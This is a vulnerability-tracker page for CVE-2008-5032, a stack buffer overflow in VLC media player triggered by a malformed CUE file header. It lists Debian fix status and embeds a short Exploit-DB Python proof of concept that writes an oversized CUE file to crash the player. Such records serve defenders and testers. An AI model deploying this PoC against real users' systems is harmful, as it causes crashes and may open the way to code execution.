CVE-2008-5032

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Stack-based buffer overflow in VideoLAN VLC media player 0.5.0 through 0.9.5 might allow user-assisted attackers to execute arbitrary code via the header of an invalid CUE image file, related to modules/access/vcd/cdrom.c. NOTE: this identifier originally included an issue related to RealText, but that issue has been assigned a separate identifier, CVE-2008-5036.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-9686 dos windows verified python · 1 KB

Dr_IDE · 2009-09-15

VideoLAN VLC Media Player < 0.9.6 - 'CUE' Local Buffer Overflow (PoC)

python exploit Source: Exploit-DB

#!/usr/bin/env python

####################################################################################
#
# VLC Media Player < 0.9.6 (.CUE) Buffer Overflow PoC
# Found By:	Dr_IDE
# Tested On:	XPSP3
#
####################################################################################

head = ("\x46\x49\x4c\x45\x20\x22")
buff = ("\x41" * 10000)
foot = (
"\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20\x54"
"\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32\x33"
"\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31\x20"
"\x30\x30\x3a\x30\x30\x3a\x30\x30")

f1 = open("vlc_0.8.6.cue","w")
f1.write(head + buff + foot)
f1.close()

# milw0rm.com [2009-09-15]

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`0.8.6.h-5`
sid	Fixed	`0.8.6.h-5`
forky	Fixed	`0.8.6.h-5`
bullseye	Fixed	`0.8.6.h-5`
bookworm	Fixed	`0.8.6.h-5`

References

https://security-tracker.debian.org/tracker/CVE-2008-5032

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.